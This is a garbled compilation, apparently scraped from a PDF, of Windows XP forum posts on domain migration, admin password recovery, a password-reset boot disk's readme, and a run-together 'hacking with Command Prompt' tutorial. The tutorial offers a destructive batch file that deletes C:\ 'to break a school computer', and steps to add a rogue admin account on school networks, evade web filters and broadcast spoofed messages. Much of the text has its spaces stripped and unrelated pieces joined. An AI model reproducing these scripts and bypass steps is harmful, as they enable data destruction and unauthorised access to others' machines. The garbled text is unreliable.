Company I'm working for had/has Server 2003 on a server.

But the motherboard is going out on it and it's OEM software. So I'm trying to build a new network just using XP Pro. We are small and what we are using it for doesn't justify spending 2k to replace server software. The issue I'm having is that whoever set up the network is unreachable and nobody knows the usernames and passwords to log on locally, only to login to the server domain. What resolutions are there so that I can set up new network connections on the computers which were part of the old domain? Only options avaliable once computer boots up is to either connect to domain or connect locally. Obviously if I could connect locally I could reconfigure the network. But without knowing the user and pw there is an issue. -------------------------------------------------------------------------------------------------------------------I had to do the same thing last year. The owner didn't want to pay for a new server. So I changed it from a domain network to a peer to peer network with a workgroup. Don't take any machine off the network yet. Login to the domain as administrator from each machine, one at a time. Reset the local administrator password on each machine, by going to the run box and entering compmgmt.msc , press enter. Go to local users and groups, users. highlight administrator, click action, set password. Use the same password to make it easier. At that point you will have a local administrator account for each machine. Add any domain users to the local machine who may need access at the same time. Copy their favorites, my documents, etc... from the domain account to the local account if necessary. At that point you can remove the machine from the domain and put it on the work group. Just make sure that you copy all the shares from the server to whichever machine you are going to use a file server before you remove it from the network. Set the permissions. -------------------------------------------------------------------------------------------------------------------The administrator password in Windows XP is the password used to access the "Administrator" account.
1

This account usually doesn't show up on the logon screen and most people don't know it exists. Usually that's okay because you won't need to use your computer under this account very often. However, there are a few times when you will need this password. When you're accessing the Windows XP Recovery Console or you're trying to boot into Windows XP Safe Mode, you'll need this password before you can continue. Follow the steps below to quickly find the Windows XP Administrator password on your computer: Difficulty: Average Time Required: Figuring out the Administrator password may take a few minutes to hours depending on the situation Here's How: 1. Try leaving the password blank. Just press Enter without typing anything when asked for it. The password to the Windows XP Administrator account is defined during the initial Windows XP installation process and it's often simply left blank. 2. Enter the password to your account. Often times, depending on how Windows XP was setup on your computer and what part of XP is asking for an admin password, the primary user account will also be configured with administrator access. 3. Try to remember your administrator password. If you installed Windows XP on your computer yourself, you probably set the administrator password during the Windows XP installation process. If that's true, you might be able to make really good guesses at what the password might be. 4. Have another user enter his or her password. If there are other users that have accounts on your Windows XP computer, one of them may be setup with administrator access. 5. Recover the administrator password using a Windows password recovery tool. These tools are software programs designed to discover or reset/delete Windows passwords. Note: Some password recovery tools is the list I linked to above also have the ability to transform regular user passwords into administrator passwords. This could be valuable if you know your account's password but it's not an administrator account.
2

6. Perform a clean installation of Windows XP. This is a last resort option. This type of installation will completely remove Windows XP from your PC and install it again from scratch. If you're just curious about the password to your Administrator account then obviously don't go to this extreme. However, if you're needing the Administrator password to access diagnostic tools and this is your last effort to save your PC, performing a clean install will work. Tips: 1. Looking for your administrator password but aren't using Windows XP? See How to Find Windows Administrator Passwords for instructions tailored for other Windows operating systems. I've put together a single floppy or CD / USB Drive which contains things needed to reset the passwords on most systems. The CD can also be installed on a USB drive, see readme.txt on the CD. The bootdisk should support most of the more usual disk controllers, and it should auto-load most of them. Both PS/2 and USB keyboard supported. More or less tested from NT3.5 up to Windows 7, including the server versions like 2003 and 2008. Also 64 bit windows supported. DANGER WILL ROBINSON! If password is reset on users that have EFS encrypted files, and the system is XP or newer, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again If you don't know if you have encrypted files or not, you most likely don't have them. (except maybe on corporate systems) Please see the Frequently Asked Questions and the version history below before emailing questions to me. Thanks!

Should now be possible to load extra drivers (drivers?.zip) from USB the same way as with floppy. Or maybe not. Did not test it that much. Fixed a lot of bugs in the registry handling, did not affect password reset much, but did affect larger registry edits.

You still may experience hangs when the NTFS disk is mounted, it will hang after saying "NTFS version x.xx" or such. If there is disc activity, just wait, it may take a while.

2007-09-27

Patched up NTFS driver to get rid of hang on mount in many cases (after selecting disk). Got many problem reports on this. At the same time someone on the NTFS-for-linux mailinglist mentioned it, and Anton Altaparmakov made a patch very quick. Thank you Anton! Nice if people experiencing the hang in 2007-09-23 can mail me and tell if the fix worked or not. Thanks! NOTE: It may still take up to a minute or two to select the disk. Floppy version had a script bug making it crash in the first menu. Fixed. CCISS driver (HP/Compaq DLxxx etc) had different device paths. Hacked in support for it, may not be 100% still.

2007-09-23

Floppy version is back! (requires 3 floppies to get all drivers, but you can compose your own driver set so you only need 2) Yes, VISTA is supported (even more) Disk select now indicates which disks are removable, ie are USB keys for instance. Check for "read-only" NTFS mount, you get instructions on what to do if there are problems with the disk so changes won't be saved. Missed out on some IDE/ATA and SATA drivers last time, better now.. I hope. User can be added to the administraror group, making them administrators. Stupid typo in readme.txt on CD fixed, on how to make USB bootable.

(earlier history removed) 9705xx

First public release.

Download Note: Some links may be offsite.

4

CD release, see below on how to use

cd110511.zip (~3MB) - Bootable CD image. (md5sum: fe0d30a1c540ec6757e748c7c09e2e4f) usb110511.zip (~3MB) - Files for USB install (md5sum: 50ced8d2a5febe22199f99acec74e63b) cd100627.zip (~4MB) - Previous version CD. (md5sum: 6d80cdfbba97457e413f95a3554d9524) The files inside the USB zip are exactly the same as on the CD. See below for instructions on how to make USB disk bootable.

Floppy release (not updated anymore), see below on how to use them

bd080526.zip (~1.4M) - Bootdisk image (md5sum: 37889e4c540504e59132bdcdfe7f9bb7) drivers1-080526.zip (~310K) - Disk drivers (mostly PATA/SATA) (md5sum: 72ac1731c6ba735d0ac2746a30dbc3ee) drivers2-080526.zip (~1.2M) - Disk drivers (mostly SCSI) (md5sum: 30172bec657c85a5f1a0b43601452fb7)

Previous versions may sometimes be found here (also my site) NOTE: Versions before 0704xx will corrupt the disk on VISTA! NOTE THAT THE BOOTDISK CONTAINS CRYPTHOGRAPHIC CODE, and that it may be ILLEGAL to RE-EXPORT it from your country. How to make the CD Unzipped, there should be an ISO image file (cd??????.iso). This can be burned to CD using whatever burner program you like, most support writing ISO-images. Often double-clikcing on it in explorer will pop up the program offering to write the image to CD. Once written the CD should only contain some files like "initrd.gz", "vmlinuz" and some others. If it contains the image file "cd??????.iso" you didn't burn the image but instead added the file to a CD. I cannot help with this, please consult you CD-software manual or friends. The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a bootmenu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup.
5

How to make an bootable USB drive Copy all the files that is inside the usbXXXXXX.zip or on the CD onto an usb drive, directly on the drive, not inside any directory/folder. It is OK if there are other files on the USB drive from before, they will not be removed. Install bootloader on the USB drive, from command prompt in windows (start the command line with "run as administrator" if possible) X:syslinux.exe -ma X: Replace X: with the drive letter the USB drive shows up as (DO NOT USE C:) If it seems like nothing happened, it is usually done. However, a file named ldlinux.sys may appear on the USB drive, that is normal. It should now in theory be bootable. Please know that getting some computers to boot from USB is worse than from CD, you may have to change settings, or some will not simply work at all. How to make the floppy The unzipped image (bdxxxxxx.bin) is a block-to-block representation of the actual floppy, and the file cannot simply be copied to the floppy. Special tools must be used to write it block by block.

Unzip the bd zip file to a folder of your choice. There should be 3 files: bdxxxxxx.bin (the floppy image) and rawrite2.exe (the image writing program), and install.bat which uses rawrite2 to write the .bin file to floppy. Insert a floppy in drive A: NOTE: It will lose all previous data! Run (doubleclick) install.bat and follow the on-screen instructions. Thanks to Christopher Geoghegan for the install.bat file (some of it ripped from memtest86 however)

Or from unix: dd if=bd??????.bin of=/dev/fd0 bs=18k How to make and use the drivers floppy

Simply copy the zip file onto an empty floppy. You MUST NOT UNZIP THE ZIP FILE!

Depending on your hardware you may only need one of the driver sets or the other, or maybe both. To use, insert one of the driver floppies when asked for it after booting, the zip file will be unzipped to memory. If no drivers matched (no harddisk found), you can select 'f' from the main menu to load the other driver set. Then select 'd' to auto-start the new drivers (if it matches your hardware) Sometimes it fails detecting the floppy change and you get an error, just select 'f' again, it works the second time. For more advanced users that uses this often, it is possible to unzip just the drivers you need and zip them up into a new zip archive. The zip file name must start with "drivers", the rest is ignored. (it unzips drivers*.zip) RegeditUses: ForAllUSBPortDisable HKEY_Local_Machine System CurrentControl set Services USBSTOR(DoubleclickintheUSBSTORonelistwillopenin therightsideonthatlistdoubleclicktheStartandchangethevalueto4 (disable)3isenable. youcan"hack"allofthefollowingwithCommandPrompt MostWebsites UserAccounts(onyourcomputer) ComputerSettings Email andsomeotherstuff. TodoanythingrelatedtohackingwithCommandPromptyoumustknow mybestfriendandhisnameisIP! IPiseverythinginthecyberworld,itidentifiesyoulikenoother,withyour IPsomeonecanfindoutwhereyoulive,whothecomputersregisteredto, thecomputersname,andmore!SothinkofitasyourcyberSocialSecurity Number(SSN)youdon'twanttojusttelleveryoneit. SotogetyourIPyoucanstartbyopeningCommandPrompt NextmakesureitisonC:Drive
7

Thentypeinthefollowingipconfig/all Thiswilldisplayalotofinfosomeofwhichisveryimportant Thiswilltellyouhowyouareconnectedtotheinternetandwithwhatand alsoalotofotherstuff(iwillnotliesomeoftheinfoitgivesisuseless) Congratsyoulearnacommand!andyouhavenowfoundoutyourIP!(im nottellingwhereitisimjustsayingitsthereifyouscrollupalittlebit) Nowtofindinternetconnection! LetssayyouandafriendareplayingaMMOandyourfriendishostand youarelaggingwellifyouwanttofindoutwhyjusttypeintocommand promptthefollowingPing127.0.0.1(replace127.0.0.1withyourfriends IP)(also127.0.0.1islocalhostoryouandisusedforoffline"things")(italso meansnothingtowardsyourIPbasicly) thelowerthenumberyouseethebetter!lowermeansfasterandhigher meansslower Nowtimeforsome"Advanced"stuff Howtofindoutcomputeraccountpasswords! thiswillrequireyoutoknowtheusername. FirstopenCommandPrompt ThentypeinthefollowingNetUser Thiswillgiveyoualltheaccounts(soiliedyoudidn'tneedtoknowthe USernamesxD NowtypeinNetUserAdmin(youmayreplaceAdminwiththeaccount name) Nowyougetevenmoreinfoonthataccountifyoureaditallittellsyou aboutthepassword NowifyouwanttochangethepasswordjusttypethefollowingNetUser AdminPassword(youcanreplaceAdminwiththeusernameandPassword withthedesiredpassword)andTADAyouhavechangedtheaccount password. O.K.thatisallthatiwillcurrentlysay,iwillpostmoreinthefuture,thisis jsutatasteofthingstocomeandnowforsomefunwithCommand Prompt!
8

OpenupNotepad.exeorinCommandPrompttypeNotepad(youmaytype inafilesnamewithoutthe.exeontheendanditwillrunit) Nowtypeinthefollowing: start start start start start start startcrash thenclickSaveasandselectallfiles,thennameis.batandwhenyouare boardjustrunitandu'llseewhatitdoes(makesureyousavewhatyour doingfirst!)itwillautonametoCrash.bat O.K.itakeNORESPONSIBILITYFORWHATIAMABOUTTOPOST!thisfile willBREAKYOUCOMPUTER! @echooff taskkillfexplorer.exe start%windir%\System32\rundll32.exeuser32.dll,LockWorkStation rdc:\/s/q cls putthatintoanotepadandnameitBreak.batnowwhatwillthisdo?itwill firstdeleteallinternetbrowsers!thenitwilllockyououtofyourcomputer andthendeleteyourSystem32filewhichiswhatyourcomputerneedsto RUN!nowDONOTUSETHIS!ionlypostedthisforthosehowwanttobreak aschoolcomputer!becarefulwiththisbecauseyouwillneedtogetanew computersincerestoringcan'tfixthis!nowbesafeandhavefunwiththe newskillsihavejusttaughtyou!don'tforgettothanksandrepme! OpencommandpromptfromwhereitisBannedornotallowedbyadmin (awesometricks)
9

OpenupCommandPrompt(Start>Run>Command.com) Can'tusecommandpromptatyourschool? OpenupMicrosoftword..Type: Command.com ThensaveitasSomthing.bat. Warning:Makesureyoudeletethefilebecauseiftheadminfindsoutyourin bigtrouble. Addingausertoyournetwork Type: NetuserHaxxor/ADD Thatwilladd"Haxxor"ontotheschoolusersystem. Nowyouaddedusersletsdeletethem! Type:NetuserHaxxor/DELETE Warning:Becarefullitdeletesalltheirfiles. "Haxxor"willbedeletedfromtheusersystem.
10

Hmmm?Itsaysaccessdenied? Thatsbecauseyournotadmin! NowletsmakeyourAdmin! ThiswillmakeHaxxoranadmin.Rememberthatsomeschoolsmaynotcall theiradmins'adminstrator'andsoyouneedtofindoutthenameofthelocal grouptheybelongto. Type:netlocalgroup Itwillshowyouwhattheycalladmin,sayatmyschooltheycalllit adminstratorsotheniwould Type:netlocalgroupadministratorHaxxor/ADD Gettingpastyourwebfilter. Easyway:Typewhateveryouwanttogoonsayiwantedtogoonminiclipsbug onwireiwouldgotogoogleandsearchminiclipbugonwire theninsteadofclickingthelinkiwouldclick"cached". Hardway:I'mhopingyoustillhavecommandpromptopen. Type:pingminiclip.com AndthenyoushouldgetaIPtypethatoutinyourwebbrowser,anddon't
11

forgettoput"http://"beforeyoutypetheIP. Sendingmessagesthroughyourschoolserver Okay,here'showtosendcrazymessagestoeveryoneinyourschoolona computer.Inyourcommandprompt,type NetSend<domain>*"Theserverish4x0r3d" Note:<domain>maynotbenecessary,dependingonhowmanyyourschoolhas accesstoo.Ifit'sjustone,youcanleaveitout. Where<domain>is,replaceitwiththedomainnameofyourschool.For instance,whenyoulogontothenetwork,youshouldhaveachoiceofwhereto logon,eithertoyourschool,ortojustthelocalmachine.Ittendstobecalled thesameasyourschool,orsomethinglikeit.So,atmyschool,Iuse NetSendHaxxorSchool*"Theserverish4x0r3d" Theasteriskdenoteswildcardsending,orsendingtoeverycomputerinthe domain.Youcanswapthisforpeople'saccounts,forexample NetSendVarndeandan,jimmy,admin"Theserverish4x0r3d" usecommastodividethenamesandNOSPACESbetweenthem. whatsay?? ~Cheers~ or
12

Allowing dos and regedit in a restricted Windows AverysimpletacticIfoundafteraccidentallylockingmyselfoutofdosand regeditistoopennotepadandtypethefollowing: REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOl dApp] "Disabled"=dword:0 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSyste m] "DisableRegistryTools"=dword:0 Saveitassomething.regthenrunit.Simple. NETWORKING HACK hatWithCommandPrompt C Talkwithothercomputersonyour network. If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! All you need is your friends IP address and Command Prompt. Firstly, open Notepad and enter: @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A

13

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see: MESSENGER User: After "User" type the IP address of the computer you want to contact. After this, you should see this: Message: Now type in the message you wish to send. Before you press "Enter" it should look like this: MESSENGER User: 56.108.104.107 Message: Hi Now all you need to do is press "Enter", and start chatting!

How to start System Restore by using the Command prompt NoteYoumustbeloggedontoWindowswithauseraccountthatisacomputer administratortocompletethesesteps.Toverifythatyouareloggedonto Windowswithauseraccountthatisacomputeradministrator;visitthefollowing MicrosoftWebsite: Ifanewprogramhasmadeyourcomputerbehaveunpredictably,anduninstalling thenewprogramdidnothelp,youcantrytheWindowsXPSystemRestoretool. ImportantIfyouhavenotpreviouslysetarestorepointinSystemRestore,you cannotrestoreyourcomputertoapreviousstate.Ifyouarenotsure,orifyou havenotpreviouslysetarestorepoint,contactSupport. TostartSystemRestoreusingtheCommandprompt,followthesesteps: 1. Restartyourcomputer,andthenpressandholdF8duringtheinitialstartup tostartyourcomputerinsafemodewithaCommandprompt.
14

2. UsethearrowkeystoselecttheSafemodewithaCommandprompt option. 3. Ifyouarepromptedtoselectanoperatingsystem,usethearrowkeysto selecttheappropriateoperatingsystemforyourcomputer,andthenpress ENTER. 4. Logonasanadministratororwithanaccountthathasadministrator credentials. 5. Atthecommandprompt,type%system root%\system32\restore\rstrui.exe,andthenpressENTER. 6. Followtheinstructionsthatappearonthescreentorestoreyourcomputer toafunctionalstate. NoteTostarttheSystemRestoretoolusinganothersafemodeoption,visitthe MicrosoftHelpandSupportWebsiteandseethearticle"AdescriptionoftheSafe ModeBootoptionsinWindowsXP."ForadditionalinformationabouttheSafe modewithacommandprompt,clickthefollowingarticlenumbertoviewthe articleintheMicrosoftKnowledgeBase: 315222AdescriptionoftheSafemodebootoptionsinWindowsXP Finding the IP Address for another Computer in Windows XP/Vista/7 Notes: Important: You must know the full computer name of the computer for which you want to find the IP address. If the computer for which you are trying to find the IP address uses a DHCP connection, keep in mind that the IP address will change on a regular basis. To find another computer's IP address:

1. Connect to the Internet. 2. Click the Start button. 3. Start the Run utility. o In Windows XP, select Run. o In Windows Vista/7: 1. Select All Programs. 2. Select Accessories. 3. Select Run. 4. In the Open: text box, type: cmd 5. Click OK. 6. Ping the computer for which you want to find the IP address.
15

In XP, at the command prompt, type: ping [Full Computer Name] Note: Replace [Full Computer Name] with the full name of the computer.

In Vista/7, at the command prompt, type: ping -4 [Full Computer Name] Note: Replace [Full Computer Name] with the full name of the computer.

7. Press the Enter key. 8. Locate the IP address in the results of your ping session. 9. Close the command prompt window. 10.hereisahiddenadministratoraccount.Youcanlogonitandyoucan changeorremovealltheotherpassesofyourcompwithoutknowingthe previouspasses.JusttypectrlaltdeltwiceandthentypeAdministratoron theaccountnameandyoucanenter.Ifthatwon'twork,restartthe computerandtoggletheF5button.Youwillgetscreenthatwillaskyouif youwanttobootwithcommandprompt,chooseitandthentypenetuser, thenpressenter #Thenagaintype"Netuser[UsernameoftheAccount]*"thenpressEnter, withoutthe["],andquotes.Makesureyouspelltheusernamecorrectly, andyouhavethe'*' #Tochangepasswordpressenterandafterthattielersouth*Reset passwordtowhateveryouwant. Ifthatwon'twork,gotothislink..moresuggestedinfoonthereplies 11. 12.Viewall10comments 13.LITTLECOMPNERDMay19,20094:08pmBST 14.pressf8thenselectstartsafemodecommandprompt 15.EdrickOct24,20098:40amBST 16.hicanyouhelpmeiwanttousemybro.compbutidontknowhispass howcaniknowitwithoutchanginganythingorrestingitplshelpme 17.ARKMay26,20111:21pmBST
16

18.Edrick,thatseasyjustfollowthesesteps, 1.askyourbrothepass 2.enterinthepass 3.Voila!!YOUAREON!! Thereare3realwaystobypassanystuckpasswordsonanyXPcomputer. 1.Usethebuildinmachineadministrator,ifit'sunlocked.Seeingthat administrator'scanchangethepasswordsofadministrators,accesstoany localadministrativeaccountwillyieldanentrytotheuseraccountcontrol panelapplet.Toseeifyourbuiltinadminaccountisunlocked,youwill needtostartthecomputernormally.Whenitfinishesloading,youwill haveoneoftwoscreens:Thewelcomescreen,ortheWindowsLogon screen.Ifyouhaveawelcomescreen(WindowsXPHomedefault)youwill needtopressCTRLALTDELsimultaneously,andthenagain.CTRL+ALT+DEL releaseCTRL+ALT+DELrelease.Thewelcomescreenshouldchangetothe advancedloginscreen,thatyoumayalreadyhaveifyouhaveturnedoff thewelcomescreen,orifyouareusingXPpro,orWindowsServer2003. Next,forusernametypeinAdministrator,leavethepasswordblank.Ifyou cangetinwiththisaccount,oranyadministratoraccount,clickonstartand clickrun.Type"ControlUserPasswords2".Fromhere,adjustthepasswords ofeachaccountonthecomputerasyouseefit. 2.Next,let'ssayyoucan'tgetintoanyadministrativeaccount,orperhaps windowsarenotloadingallthewaybecauseyourproductkeyhasexpired. YouwillNOTbeabletoaccesscommandpromptinsafemodetochange administrativeaccountsunlessyoucanactuallylogontothecomputer,soif windowsislockedbecauseofproductkeyissues,don'ttrythis.Butifyou canstillgetintoauseraccountthatisnotanadmin,andyouneedto unlockanadmin,theloginasthenormaluserandcreateanewaccount usingcommandprompt(asalimiteduseryoucannotdothisviathecontrol panel)andtype
17

 netuserAdmin2password1/create ThiscreatesanaccountnamedAdmin2withapasswordofpassword1. nextseeifyoucanmakethisaccountanadmin.type netlocalgroupAdministratorsAdmin2/add ifyougetanaccessdeniedmessage,youwillneedtogotostep3.Ifyou getacommandcompletedsuccessfully,thelogoutandgotothenormal loginscreen.ThenloginasAdmin2withthenewaccount,andyounow haveadmincontrolofthepc.Gotostep1. 3.Ifyoucannotgetintowindowsasanyaccountorusingcommandprompt insafemodeorifwindowsislockedwithabadproductkey,youcanuse thirdpartysoftwaretoadjusttheAdminPassword,ortoadjustthe Microsoftoobeactivationclient,sothatyoucanregainaccess.My suggestionswouldbetouseLinuxbootdisc,(whichyoucanputonaCD, floppy,orflashdrive)andaslongasBIOSisconfiguredtoacceptaboot orderwithoneofthesedevicesbeforetheharddrive,thenyouaregoodto go.Ifnot,youwillhavetogointoBIOStochangeit.TypeF1orF2at startuptogainaccesstoBIOS.IfthereisaBIOSpassword,andyoudon't knowit,youwillhavetoresetBIOSusingtheresetjumperontheinsideof themotherboard.LookthatuponGoogleformoreinformation. 4.Ifallelsefails,andyoucannotgetin,youwillhavetosettlefor reformatting.Thiswillclearalluserdataandfilespreviouslyonthe computerthough,sosavewhateveryoucanbeforehand.Then,onanother computer,downloadacopyofaninstallationdiscforTorrentsorpiratebay andburntheISOtoadiscusingIMGBurnorNero,oranyofthoseother hokeyISOburningprograms.Then,placethediscinthecomputeryouwant toreformat.Whenitsays"Pressanykeytobootfromdisc"(duringthe normalboot)pressakey,andwaitfortheOStoloadtheWINDOWSSetup Menu.Followtheonscreeninstructionstoreformattheharddriveand
18

reinstallwindows.Ifitasksyouforthecurrentadminpasswordyouare doingsomethingwrong.Makesureyouarenottryingtorepairwindows,or installwindowsontothealreadymadepartition.Thiswillaskfora password.YouneedtopressDtodeletethepartition.Deleteallpartions onthedrive.Ltoconfirmthedelete.Thenonceyourdiscisempty,press entertoreinstallwindowsandreformat,etc.Followthedirectionsonthe screen.IfyouareusingacrackedversionofWindows,youwillnotneeda productkey.Ifyouareusinganormaldisc,andyouhaveaproductkeythat works(usuallyonthesideoftheOEMmachine,oronalabelonthe softwarepackagefororderedproducts)thentypethatinifitasksforit duringsetup,oraftersetuponthefirstlogonwhenMSOobe(theactivator) starts. Anyquestions,orifyou'dlikemetooutlinespecificinstructionsforyouina specificscenario,emailmeprivatelyatzgwin(at)zigweb(dot)net. ~Zach MicrosoftMVP SoftwareArchitect 19. 20.Viewall4comments 21.drewJul23,20096:37amBST 22.Zach, firstoffireadsomeofthestufuwroteonaforumandfigureduknewwhat youweretalkingabout,soithoughtumightbeabletohelp.ihaveavirus onmycomputerthathasallowedsomeonetohackintoitandchangemy loginpasswordonwindowsxphomeedition.ivtriedeverythingicantoget intoit,ivgonethroughbios,ivtriedF2,5,8,10and12,andivgotnothing.i dontreallyhaveawaytogetanytypeofpasswordcrackingsoftwearonto acdoranything,iwaswonderingifyoucouldtellmemaybehowtohack myowncomputertobypasstheloginscreen.ohandanotherthingtoothat ithoughtwasweird,whenitriedtobootfromadiskitsaidthatit couldn't...idontknowyitwouldsaythatwhenihaveacdandadvddrive
19

andtheybothwork.butyeathatswhereimat.maybeucanshedalittle lightonthatforme.thanks. Drew 23.frustratedSep14,20093:36amBST 24.IhavealegalversionofWindowsXPPro,withdisksandproductkeyandall that.Ievenhaveaccesstoauseraccountwithadministrativerights.My problemisthehiddenAdministratoraccount(thatIcanonlyseewhen bootinginSafeMode)hasapasswordonit,andIcan'trememberwhatit is.IneeditbecauseIwanttoresetmyMBR,andtheonlywayI'vefound todothatistobootfromtheinstallationCDandgointorecoverymode and runfirmer.Togetintorecoverymode,Ineedthepasswordtothis Administratoraccount.Doyouknowofawaytoresetthispasswordorget aroundthisproblemsomehow?? Thanksatonforanyhelp. 25.awmkingOct25,20095:33amGMT 26.Couldyoupleasehelpmetoo?Willthisinfoworkforwindowsvistahp?I cannotseemtorecovermyadminpass..pleasehelp...thanksinadvance 27.Answer 28.+8 29. 30.Report 31.dzbunniOct9,200912:19amBST 32.THISEASYMETHODJUSTWORKEDFORME,IBYPASSEDTHEPASSWORDBY DELEATINGIT,THENCREATEDNEWONE,SYSTEMWORKINGGREAT,NO ADVERSEGLITCHES! Ihaveadelllaptop,forgotthepasswordIcreated,andiamthemain accountholder.mycomputerguyIassumehascreatedanadministrator password,butwhenIcontactedhimaboutthisissue,iwastoldthere wouldbea$50feetoresetthepassword,soicametothisforumandtried everymethodlistedhere! Ofcourse,itwasntuntilIgottothelastfewpostingsthatifoundonethat
20

worked! Thismethodjustworkedcompletelyforme,Iamnowoperatingwindows innormalmodeandhappytoofimpressedmyself,loll!Idecidedtopost thismethodinPLAINENGLISH,forthoseofuslesscomputersavy. 1.whenwindowsisstartinguppressF8(Ihadtoattemptthisafewtimes tilligotitright,whenIcontinuouslyhittheF8keyasfastasicouldit worked,butyoumustbeginhittingitassoonaswindowsbeginstoload) 2.(Thiswilltakeyouintoascreenwherewindowslistdifferentsettingsyou canchoose,astohowyouwantwindowstorun.Iusedthearrowkeyson mykeyboard,andselectedsafemode) selectSAFEMODE 3.(forusername,typetheword)administrator 4.(nopasswordshouldbeneeded,sothenpress)enter 5.(windowsshouldthenloadinsafemode.accessthecontrolpanelby doingthefollowing); clickstart,controlpanel,useraccounts 6.Onceinuseraccounts,findthenameoftheaccountthatyouneedthe passwordfor,and clickonthataccount, thenclickontheoptiontoremovethepasswordforthataccount THATACCOUNTISNOWPASSWORDFREE!!!! 7.Restartwindowsinnormalmodeandlogin! Ialsothenmanagedtocreate(recreate)apasswordforthataccountas well,andthenicreatedaguestaccounttoo! CDriveaiMaraika
21

In run command regedit-->HKEY_CURRENT_USER ->Software/microsoft/windows/current/version/policies/explorer Ithil explorereai click seitha vudan right sideil sola menu thondrum.athil blankana idathil vaaithu right click seithal new ->DWORD VALUE ponal oru dialogue box onnu open aagum athil.(Intha NEW folderukku name kodukkavum NoDrives). Then antha DWORD Value boxil C driveai maraikka vendum yendral 4 kodukavum.Then decimalai click seithu ok kodukkavum.piragu restart seiyavum.ippa paarthaal c drive marainju poirukkum.

A:1, B:2, C:4, D:8, E:16, F:32, G:64 ,H:128, I:256, J:512, K:1024, Z:33554432 Command Lines: ADDUSERS ADmodcmd ARP ASSOC ASSOCIAT ATTRIB b BCDBOOT Create or repair a system partition BOOTCFG Edit Windows boot settings BROWSTAT Get domain, browser and PDC info c CACLS CALL CD Folder CHANGE CHKDSK CHKNTFS CHOICE CIPHER CleanMgr bin CLEARMEM Change file permissions Call one batch program from another Change Directory - move to a specific Change Terminal Server Session properties Check Disk - check and repair disk problems Check the NTFS file system Accept keyboard input to a batch file Encrypt or Decrypt files/folders Automated cleanup of Temp files, recycle Clear memory leaks
22

Add or list users to/from a CSV file Active Directory Bulk Modify Address Resolution Protocol Change file extension associations One step file association Change file attributes

CLIP Copy STDIN to the Windows clipboard. CLS Clear the screen CLUSTER Windows Clustering CMD Start a new CMD shell CMDKEY Manage stored usernames/passwords COLOR Change colors of the CMD window COMP Compare the contents of two files or sets of files COMPACT Compress files or folders on an NTFS partition COMPRESS Compress individual files on an NTFS partition CON2PRT Connect or disconnect a Printer CONVERT Convert a FAT drive to NTFS. COPY Copy one or more files to another location CSCcmd Client-side caching (Offline Files) CSVDE Import or Export Active Directory data d DATE Display or set the date DEFRAG Defragment hard drive DEL Delete one or more files DELPROF Delete NT user profiles DELTREE Delete a folder and all subfolders DevCon Device Manager Command Line Utility DIR Display a list of files and folders DIRUSE Display disk usage DISKCOMP Compare the contents of two floppy disks DISKCOPY Copy the contents of one floppy disk to another DISKPART Disk Administration DNSSTAT DNS Statistics DOSKEY Edit command line, recall commands, and create macros DSACLs Active Directory ACLs DSAdd Add items to active directory (user group computer) DSGet View items in active directory (user group computer) DSQuery Search for items in active directory (user group computer)
23

DSMod Modify items in active directory (user group computer) DSMove Move an Active directory Object DSRM Remove items from Active Directory e ECHO Display message on screen ENDLOCAL End localisation of environment changes in a batch file ERASE Delete one or more files EVENTCREATE Add a message to the Windows event log EXIT Quit the current script/routine and set an errorlevel EXPAND Uncompress files EXTRACT Uncompress CAB files f FC Compare two files FIND Search for a text string in a file FINDSTR Search for strings in files FOR /F Loop command: against a set of files FOR /F Loop command: against the results of another command FOR Loop command: all options Files, Directory, List FORFILES Batch process multiple files FORMAT Format a disk FREEDISK Check free disk space (in bytes) FSUTIL File and Volume utilities FTP File Transfer Protocol FTYPE Display or modify file types used in file extension associations g GLOBAL Display membership of global groups GOTO Direct a batch program to jump to a labelled line GPUPDATE Update Group Policy settings h HELP Online Help i iCACLS Change file and folder permissions IF Conditionally perform a command
24

IFMEMBER Is the current user in an NT Workgroup IPCONFIG Configure IP k KILL l LABEL LOCAL LOGEVENT LOGMAN LOGOFF LOGTIME m MAPISEND Send email from the command line MBSAcli Baseline Security Analyzer. MEM Display memory usage MD Create new folders MKLINK Create a symbolic link (linkd) MODE Configure a system device MORE Display output, one screen at a time MOUNTVOL Manage a volume mount point MOVE Move files from one folder to another MOVEUSER Move a user from one domain to another MSG Send a message MSIEXEC Microsoft Windows Installer MSINFO32 System Information MSTSC Terminal Server Connection (Remote Desktop Protocol) MV Copy in-use files n NET Manage network resources NETDOM Domain Manager NETSH Configure Network Interfaces, Windows Firewall & Remote access NETSVC Command-line Service Controller NBTSTAT Display networking statistics (NetBIOS over TCP/IP) NETSTAT Display networking statistics (TCP/IP) NOW Display the current Date and Time NSLOOKUP Name server lookup NTBACKUP Backup folders to tape
25

Remove a program from memory Edit a disk label Display membership of local groups Write text to the NT event viewer Manage Performance Monitor Log a user off Log the date and time in a file

NTRIGHTS Edit user account rights o OPENFILES Query or display open files p PATH Display or set a search path for executable files PATHPING Trace route plus network latency and packet loss PAUSE Suspend processing of a batch file and display a message PERMS Show permissions for a user PERFMON Performance Monitor PING Test a network connection POPD Restore the previous value of the current directory saved by PUSHD PORTQRY Display the status of ports and services POWERCFG Configure power settings PRINT Print a text file PRINTBRM Print queue Backup/Recovery PRNCNFG Display, configure or rename a printer PRNMNGR Add, delete, list printers set the default printer PROMPT Change the command prompt PsExec Execute process remotely PsFile Show files opened remotely PsGetSid Display the SID of a computer or a user PsInfo List information about a system PsKill Kill processes by name or process ID PsList List detailed information about processes PsLoggedOn Who's logged on (locally or via resource sharing) PsLogList Event log records PsPasswd Change account password PsService View and control services PsShutdown Shutdown or reboot a computer PsSuspend Suspend processes PUSHD Save and then change the current directory q QGREP Search file(s) for lines that match a given pattern.
26

